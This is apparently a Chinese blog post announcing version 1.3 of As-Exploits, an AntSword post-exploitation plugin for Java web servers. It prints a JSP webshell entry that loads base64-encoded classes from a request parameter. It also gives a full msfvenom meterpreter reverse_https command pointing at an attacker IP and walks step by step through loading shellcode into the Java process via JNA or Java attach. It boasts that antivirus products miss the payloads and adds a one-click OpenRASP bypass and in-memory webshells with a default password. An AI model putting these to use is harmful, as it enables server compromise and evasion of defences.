As-Exploits v1.3更新

更新主要内容

v 1.3 (2021/5/14)

  • equals支持数组传参方式,兼容各种容器

  • jsp新增 ShellCode加载器模块,内置两种分别基于jna跟java agent的shellcode加载方式

  • jsp新增 Bypass OpenRASP 模块,thx@Godzilla

  • JarLoader模块 新增手动上传方式,解决因Tomcat最大POST长度为2m导致无法加载内存Jar的问题

  • reGeorg内存马改为更稳定的neo-reGerog,默认密码:asexploits

  • 冰蝎内存马支持3.7,去除pageContext依赖,兼容Spring等容器

  • 各模块兼容JDK5

挑几个重点的说说

Shell入口参数支持数组形式

Shell入口参数即下面new Object[]{request,response}的部分。

<%
    String cls = request.getParameter("ant");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});
    }
%>

至于为什么要改这个玩意要从内存马的兼容说起。

除了由于写法问题而导致的各种乱七八糟的问题以外,连接内存马的一个主要问题是冰蝎在入口处采用了pageContext这个类来获取request response session对象。但是以filter型内存马为例,doFilter中三个参数分别是ServletRequest,ServletResponse,FilterChain,并不存在pageContext这个东西,并且在SpringBoot这种容器里根本没有pageContext这个类。

于是就有很多师傅提出了自己的解决办法,大体分为三种:

  1. 自己声明一个pageContext类,在里面实现对应的request跟response的getter setter。冰蝎改造之不改动客户端=>内存马

  2. 改写冰蝎的入口为request+response,不再采用pageContext作为入口。但是弊端就是不能再用equals了,要重新写一个方法用反射调用。冰蝎改造之适配基于tomcat Filter的无文件webshell

  3. 采用蚁剑原来的Custom模式,把恶意函数直接通过字节码打进去,然后通过方法名调用。不过由于直接编译恶意函数的字节码较大会超过最大长度限制,一般要先写入目标然后配合URLClassLoader才能使用。使用WebLogic CVE-2020-2883配合Shiro rememberMe反序列化一键注入蚁剑shell

以上的这些方法可以是可以,但是不够优雅。

回想我们最开始的问题,为什么要用pageContext,是为了拿到当前请求的上下文,更精确一点就是输入输出:request,response。request是接收参数,response是回显,两者缺一不可。

后来自己调试的时候发现在request中本身就包含了当前的response,同样response中也包含了当前的request。

image
image

当时就想着我shell中传个request,然后在payload里面利用反射把requst里面的response取出来,或者response里面的request取出来不就完事了?

这样确实可以,在2020年9月4日,勤劳的我一大早就起来写了一波代码,然后发了上去,commit记录可以证明我没有瞎bb。当时蚁剑算是最早兼容内存马的。

image

因为Tomcat喜欢用门面模式,所以要反射两层,结果后来发现在WebLogic下用不了了,因为WebLogic不喜欢搞门面模式,只需要反射一层就够了。

行吧,那我就再加一种情况,在JSP V1.4版本又增加了一层反射的情况。

本来以为没事了,后来又发现在有shiro的情况下打一个servlet内存马进去,这时候去连接内存马需要反射三次??

image

WTF???

image

然后意识到,这种case by case的解决方式是不行的,世界上还有那么多种Web容器中间件,不可能一个一个去调吧。

所以为了彻底解决这个问题,在520师傅的建议下采用了数组的方式将两者直接传进去,把分析的逻辑放在打内存Shell的时候去做,而不在payload里面去做。

现在冰蝎跟哥斯拉也都有了相应的机制,思路大体是一样的,感兴趣的小伙伴可以自己研究一下。

JarLoader模块新增手动上传方式

内存加载

直接通过HTTP包将Jar打入目标内存,仅需选择本地需要上传的Jar文件即可,期间文件不落地。但是Tomcat默认POST最大上传大小为2M,如果超过了此大小请选择手动上传模式。

image

手动上传

先手动将Jar上传到目标服务器上,然后通过路径加载。

image

JSP ShellCode加载器

内置两种加载方式,使用之前请务必认真阅读使用说明,否则可能直接将Java进程打挂。

需要注意两点:

  • 使用MSF需要加上PrependMigrate=true PrependMigrateProc=xxxx.exe参数,自动迁移到新的进程,否则会在migrate/exit的时候把Java进程给干掉,导致网站瘫痪。例如:msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.88.129 LPORT=8888 PrependMigrate=true PrependMigrateProc=svchost.exe -f hex
  • JNA方式只需要X86类型的ShellCode即可,而Attach方式需要根据目标Java位数来选择对应的ShellCode。

JNA方式

利用第三方库JNA进行ShellCode的加载。

适用范围:JDK>=1.5

正确操作

  1. 首先利用Jar加载器将ShellCodeLoader.jar上传到目标服务器目录并加载。

  2. 使用MSF或者CS生成x86类型的shellcode,并开启监听。

  3. 在ShellCode加载器模块,输入hex或者java格式的shellcode,且不能有多余换行跟空格。

  4. 点击exploit,等待返回回话。

JNA方式测试

装了360,火绒,电脑管家

image
image

上传插件ext目录下的ShellcodeLoader.jar到目标服务器,然后复制文件路径

image

手动加载到JVM中

image

MSF生成Shellcode

image

选择JNA方式,exploit!

image

直接上线,杀软没有拦截

image
image

关于jna会生成一个临时文件的问题,发现确实会生成一个dll临时文件在Tomcat临时目录下

image

但是扫了一下发现是免杀的

image

VT检测结果0/68,也就是说落地也问题不大。

不过可能这篇文章出来之后就没了

image

Attach

模拟java agent注入过程来实现Shellcode的加载。这个native方法是jdk自带的,并且经过oracle签名的,理论上免杀效果更好。

适用范围:JDK>=1.6

正确操作

  1. 基本信息,exploit,Ctrl+F 搜索 sun.arch.data.model,查看java位数

  2. 根据java位数生成对应位数的shellcode,并开启监听。

  3. 在ShellCode加载器模块,输入hex或者java格式的shellcode,且不能有多余换行跟空格。

  4. 点击exploit,等待返回回话。

Attach方式测试

发现是64位java

image

CS生成对应位数的shellcode,选择java格式导出。

粘贴到插件中,在exploit的一刻会自动格式化为hex

image

直接上线,杀软没有拦截。

image

一键Bypass OpenRASP

借鉴自哥斯拉的插件:Godzilla-BypassOpenRasp

一键绕过OpenRASP

目标安装有OpenRASP且开启命令执行拦截

image

exploit!

image

再次运行,即可执行命令

image

其他

  • reGeorg内存马改为更稳定的neo-reGerog,默认密码:asexploits

  • 冰蝎内存马去除pageContext依赖,兼容Spring等容器

  • 各模块兼容JDK5

项目地址

https://github.com/yzddmr6/As-Exploits

来颗star吧~

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,332评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,508评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,812评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,607评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,728评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,919评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,071评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,802评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,256评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,576评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,712评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,389评论 4 332
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,032评论 3 316
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,798评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,026评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,473评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,606评论 2 350

推荐阅读更多精彩内容